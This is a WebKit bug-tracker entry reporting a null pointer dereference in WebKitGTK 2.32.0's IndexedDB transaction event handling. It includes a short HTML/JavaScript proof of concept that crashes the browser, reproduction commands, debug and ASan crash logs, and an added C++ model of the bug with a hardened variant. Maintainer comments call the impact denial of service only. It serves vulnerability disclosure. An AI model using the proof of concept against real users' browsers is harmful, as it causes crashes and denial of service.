Bug 226820 (Status: NEW)
WebKit WebCore::IDBTransaction::dispatchEvent null pointer dereference
https://bugs.webkit.org/show_bug.cgi?id=226820
STAR Labs
Reported 2021-06-09 08:10:30 PDT
Created attachment 430967 [details]
POC with Docker for easier replication

# Apple WebKit WebCore::IDBTransaction::dispatchEvent null pointer dereference

### Affected Software

webkitGTK 2.32.0 - build in linux-18.04.

### The severity of the bug

Low

### Reproduce - Steps

```
- clean local indexeddb: root# rm -rf /root/.local/share/webkitgtk*
- open poc.html in Minibrowser version 2.32.0 - linux
```

- Or you may want to use my docker script to build.

```
# ./build.sh
# export DISPLAY=:1000
# Xvfb :1000 -screen 0 1920x1080x24 &
# rm -rf /root/.local/share/webkitgtk* && DISPLAY=:1000 LD_LIBRARY_PATH=/root/webkitASAN/lib /root/webkitASAN/bin/MiniBrowser ~/poc.html
```

### Description of the vulnerability

The poc.html:

```
<script>
request = window.indexedDB.open("AA", 1);
request.onupgradeneeded = () => {
    select_event = new Event('select'); // create select event
    request.transaction.dispatchEvent(select_event); // dispatch this select event (1)
};
</script>
```

##### Enable IndexedDB debug Log:

To print out the tracing log of the indexeddb part, we need to export an environment variable WebkitDebug by command:

```
root# export WebkitDebug=IndexedDB=debug
root# rm -rf /root/.local/share/webkitgtk* && DISPLAY=:1000 LD_LIBRARY_PATH=/root/webkitASAN/lib /root/webkitASAN/bin/MiniBrowser ~/poc.html
```

The tracing log:

```
IDBFactory::open
IDBConnectionToServer::openDatabase - AA@file://:file:// (<8, 3>) (1)
IDBServer::openDatabase
UniqueIDBDatabase::UniqueIDBDatabase() (0x7f5fc8e91000) AA@file://:file://
UniqueIDBDatabase::openDatabaseConnection
UniqueIDBDatabase::handleDatabaseOperations - There are 1 pending
UniqueIDBDatabase::handleCurrentOperation
UniqueIDBDatabase::performCurrentOpenOperation (0x7f5fc8e91000)
SQLiteIDBBackingStore::getOrEstablishDatabaseInfo - database AA
UniqueIDBDatabase::startVersionChangeTransaction
UniqueIDBDatabaseConnection::createVersionChangeTransaction - <8, 3> - 1
SQLiteIDBBackingStore::beginTransaction - <8, 2>
UniqueIDBDatabase::handleDatabaseOperations - There are 0 pending after this round of handling
IDBConnectionToServer::didOpenDatabase
IDBOpenDBRequest::requestCompleted
IDBDatabase::IDBDatabase - Creating database AA with version 1 connection 1 (0x7f24a980a680)
IDBDatabase::startVersionChangeTransaction <8, 2>
IDBTransaction::IDBTransaction - Transaction: <8, 2> mode versionchange newVersion 1
IDBOpenDBRequest::onUpgradeNeeded() - current version is 0, new is 1
IDBRequest::dispatchEvent - upgradeneeded (0x7f24a980a430) // <--- (2)
IDBTransaction::dispatchEvent // <--- (3) select event
IDBTransaction::handleOperationsCompletedOnServer
IDBTransaction::commit
IDBDatabase::willCommitTransaction <8, 2>
IDBTransaction::commitOnServer
IDBConnectionToServer::commitTransaction
IDBServer::commitTransaction
UniqueIDBDatabaseTransaction::commit
UniqueIDBDatabase::commitTransaction - <8, 2>
SQLiteIDBBackingStore::commitTransaction - <8, 2>
SQLiteIDBTransaction::commit
UniqueIDBDatabaseTransaction::commit (callback)
UniqueIDBDatabaseConnection::didCommitTransaction - <8, 3> - 1
UniqueIDBDatabase::handleDatabaseOperations - There are 0 pending
UniqueIDBDatabase::handleDatabaseOperations - There are 0 pending after this round of handling
UniqueIDBDatabase::handleTransactions - There are 0 pending
UniqueIDBDatabase::handleTransactions - There are 0 pending after this round of handling
IDBConnectionToServer::didCommitTransaction
IDBTransaction::didCommit
IDBDatabase::didCommitTransaction <8, 2>
IDBDatabase::didCommitOrAbortTransaction <8, 2>
IDBTransaction::fireOnComplete
IDBTransaction::dispatchEvent // <--- (4) complete event
```

Following the log, MiniBrowser called into the function IDBTransaction::dispatchEvent 2 times, (3) and (4); notice that it crashed at the second call (4). Let's see the source code of this function.

http://122.11.210.191/webkit_gtk/webkit_gtk/webkit_gtk/Source/WebCore/Modules/indexeddb/IDBTransaction.cpp.html#_ZN7WebCore14IDBTransaction13dispatchEventERNS_5EventE

```cpp
// WebkitGTK2.32.0/Source/WebCore/Modules/indexeddb/IDBTransaction.cpp:592
void IDBTransaction::dispatchEvent(Event& event)
{
    LOG(IndexedDB, "IDBTransaction::dispatchEvent");

    ASSERT(canCurrentThreadAccessThreadLocalData(m_database->originThread()));
    ASSERT(scriptExecutionContext());
    ASSERT(!isContextStopped());
    ASSERT(event.type() == eventNames().completeEvent || event.type() == eventNames().abortEvent);

    auto protectedThis = makeRef(*this);

    EventDispatcher::dispatchEvent({ this, m_database.ptr() }, event);

    m_didDispatchAbortOrCommit = true;

    if (isVersionChange()) {
        ASSERT(m_openDBRequest);
        m_openDBRequest->versionChangeTransactionDidFinish();

        if (event.type() == eventNames().completeEvent) {
            if (m_database->isClosingOrClosed())
                m_openDBRequest->fireErrorAfterVersionChangeCompletion();
            else
                m_openDBRequest->fireSuccessAfterVersionChangeCommit();
        }

        m_openDBRequest = nullptr; // <--- (5)
    }
}
```

1. In poc.html, we set up a callback for the event |IDBRequest::onupgradeneeded|. When the callback is called, the function |IDBTransaction::dispatchEvent| will also be called afterwards to dispatch our select event (1).
2. The first time indexedDB is created, it dispatches an event |IDBRequest::onupgradeneeded| (2) to update the DB from version 0 -> version 1. Then it calls into our callback and |IDBTransaction::dispatchEvent| (3) to dispatch our select event. At this first call into |IDBTransaction::dispatchEvent| for changing the version, |m_openDBRequest| gets the value nullptr (5).
3. Later, a callback calls into |IDBTransaction::dispatchEvent| (4) again to dispatch the complete event, but this time |m_openDBRequest| is a null pointer; this leads to a null pointer dereference bug.

#### Asan Log

```
root@f4d851ca4fc4:~# DISPLAY=:1337 ASAN_OPTIONS=allocator_may_return_null=1,detect_leaks=0,exitcode=42 LD_LIBRARY_PATH=/root/webkitASAN/lib ASAN_SYMBOLIZER_PATH=/root/clang/bin/llvm-symbolizer /root/webkitASAN/bin/MiniBrowser indexeddb.html
WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory and useSharedArrayBuffer will be disabled.
WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory and useSharedArrayBuffer will be disabled.
WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory and useSharedArrayBuffer will be disabled.
AddressSanitizer:DEADLYSIGNAL
=================================================================
==728==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000090 (pc 0x7f2c6b776609 bp 0x7ffec44de450 sp 0x7ffec44de2f0 T0)
==728==The signal is caused by a WRITE memory access.
==728==Hint: address points to the zero page.
    #0 0x7f2c6b776609 in WebCore::IDBOpenDBRequest::versionChangeTransactionDidFinish() /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/Modules/indexeddb/IDBOpenDBRequest.cpp:86:36
    #1 0x7f2c6b7abc63 in WebCore::IDBTransaction::dispatchEvent(WebCore::Event&) /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/Modules/indexeddb/IDBTransaction.cpp:608:26
    #2 0x7f2c6c9c682a in WebCore::EventLoop::run() /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/dom/EventLoop.cpp:123:19
    #3 0x7f2c6cbb2bc8 in WebCore::WindowEventLoop::didReachTimeToRun() /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/dom/WindowEventLoop.cpp:120:5
    #4 0x7f2c6e0e142d in WebCore::ThreadTimers::sharedTimerFiredInternal() /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/platform/ThreadTimers.cpp:127:23
    #5 0x7f2c655a3fd4 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:177:16
    #6 0x7f2c655a3fd4 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:169:43
    #7 0x7f2c655a156c in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
    #8 0x7f2c655a156c in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
    #9 0x7f2c5dc7b3a4 in g_main_context_dispatch (/usr/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4c3a4)
    #10 0x7f2c5dc7b76f (/usr/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4c76f)
    #11 0x7f2c5dc7ba81 in g_main_loop_run (/usr/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4ca81)
    #12 0x7f2c655a2abe in WTF::RunLoop::run() /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:108:9
    #13 0x7f2c6a07a46d in WebKit::AuxiliaryProcessMainBase<WebKit::WebProcess, true>::run(int, char**) /root/webkitgtk-2.32.0/mybuild/../Source/WebKit/Shared/AuxiliaryProcessMain.h:70:9
    #14 0x7f2c6a07a46d in int WebKit::AuxiliaryProcessMain<WebKit::WebProcessMainGtk>(int, char**) /root/webkitgtk-2.32.0/mybuild/../Source/WebKit/Shared/AuxiliaryProcessMain.h:96:27
    #15 0x7f2c5c658bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #16 0x41cc19 in _start (/usr/libexec/webkit2gtk-4.0/WebKitWebProcess+0x41cc19)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/Modules/indexeddb/IDBOpenDBRequest.cpp:86:36 in WebCore::IDBOpenDBRequest::versionChangeTransactionDidFinish()
==728==ABORTING

** (MiniBrowser:660): WARNING **: 06:31:33.922: WebProcess CRASHED
```

Sending on behalf of our researcher, TẠ ĐÌNH SUNG of STAR Labs
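The lifecycle mistake the report walks through, as an added C++ model that is not WebKit code and not part of the original comment: the quoted `dispatchEvent` only guards the event type with a debug-only `ASSERT`, so in a release build a script-dispatched event takes the versionchange path, clears `m_openDBRequest` at (5), and the engine's own `complete` event at (4) then dereferences null. The classes below (`OpenDBRequest`, `Transaction`, `Outcome`) are hypothetical stand-ins; the `hardened` branch is one defensive pattern (a release-mode check that only `complete`/`abort` reach the versionchange bookkeeping, plus a null guard), assumed for illustration and not the fix WebKit applied.

```cpp
#include <cstddef>
#include <iostream>
#include <string>
#include <vector>

// Hypothetical stand-in for IDBOpenDBRequest: counts how often the
// versionchange bookkeeping is run against it.
struct OpenDBRequest {
    int finishedCount = 0;
    void versionChangeTransactionDidFinish() { ++finishedCount; }
};

// What a single dispatch did. NullDeref stands in for the SEGV seen in the
// ASan log; a model cannot usefully crash, so it reports it instead.
enum class Outcome { Rejected, Dispatched, NullDeref };

// Minimal model of IDBTransaction::dispatchEvent for a versionchange transaction.
class Transaction {
public:
    Transaction(OpenDBRequest* request, bool hardened)
        : m_openDBRequest(request), m_hardened(hardened) {}

    Outcome dispatchEvent(const std::string& type) {
        const bool isLifecycleEvent = (type == "complete" || type == "abort");
        if (m_hardened) {
            // Release-mode version of the debug ASSERT: script-created events such
            // as "select" must not drive the versionchange bookkeeping at all.
            if (!isLifecycleEvent) return Outcome::Rejected;
            // Second dispatch after the request was already released is a no-op.
            if (!m_openDBRequest) return Outcome::Rejected;
        }
        // Unhardened path (as in the quoted source): only ASSERT(m_openDBRequest)
        // stands before the call, and ASSERTs are compiled out in release builds.
        if (!m_openDBRequest) return Outcome::NullDeref;
        m_openDBRequest->versionChangeTransactionDidFinish();
        m_openDBRequest = nullptr; // (5): request released after the first dispatch
        return Outcome::Dispatched;
    }

private:
    OpenDBRequest* m_openDBRequest;
    bool m_hardened;
};

// Replays the order in the report's trace: a script-created "select" event
// dispatched from onupgradeneeded (3), then the engine's "complete" event (4).
std::vector<Outcome> replayReportedSequence(bool hardened, OpenDBRequest& request) {
    Transaction tx(&request, hardened);
    return { tx.dispatchEvent("select"), tx.dispatchEvent("complete") };
}

// Outcome of the dispatch at position `index` (0 = select, 1 = complete).
Outcome outcomeAt(bool hardened, std::size_t index) {
    OpenDBRequest request;
    return replayReportedSequence(hardened, request)[index];
}

// How many times the request's bookkeeping ran across the whole sequence.
int finishedCalls(bool hardened) {
    OpenDBRequest request;
    replayReportedSequence(hardened, request);
    return request.finishedCount;
}

static const char* describe(Outcome o) {
    switch (o) {
    case Outcome::Rejected:   return "rejected";
    case Outcome::Dispatched: return "dispatched";
    default:                  return "NULL DEREFERENCE";
    }
}

int main() {
    for (bool hardened : { false, true }) {
        std::cout << (hardened ? "hardened:   " : "unhardened: ")
                  << "select=" << describe(outcomeAt(hardened, 0))
                  << " complete=" << describe(outcomeAt(hardened, 1))
                  << " finishedCalls=" << finishedCalls(hardened) << '\n';
    }
    return 0;
}
```

In the unhardened replay the `select` event consumes the request and the `complete` event hits the null pointer, matching frames #0 and #1 of the ASan trace; in the hardened replay the `select` event is rejected, and the `complete` event is the one and only dispatch that touches the request.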
Attachments
POC with Docker for easier replication (4.13 KB, application/x-7z-compressed)
2021-06-09 08:10 PDT, STAR Labs
no flags
Radar WebKit Bug Importer
Comment 1 2021-06-09 08:10:41 PDT
Carlos Alberto Lopez Perez
Comment 2 2021-07-22 11:58:21 PDT
(In reply to STAR Labs from comment #0)
> Created attachment 430967 [details]
> POC with Docker for easier replication
>
> # Apple WebKit WebCore::IDBTransaction::dispatchEvent null pointer
> dereference
>
> ### Affected Software
>
> webkitGTK 2.32.0 - build in linux-18.04.
>

Note that WebKitGTK is the GTK port of the WebKit project. Meanwhile Apple WebKit is the Mac/iOS port of the WebKit project. Both ports share a common codebase, but there are enough differences between the two that a security issue reported in one does not necessarily affect the other.

I'm retitling this appropriately since the issue you report seems to have been only tested with WebKitGTK.
STAR Labs
Comment 3 2021-12-31 04:17:08 PST
Just wondering if this is fixed and if there are any CVE assigned to this? Thanks in advance.
Michael Catanzaro
Comment 4 2025-11-14 08:14:48 PST
Since a null pointer dereference will cause the process to immediately crash, there's no security impact beyond denial of service, which is not worth requesting a CVE for. I don't think this can reasonably qualify as a security bug.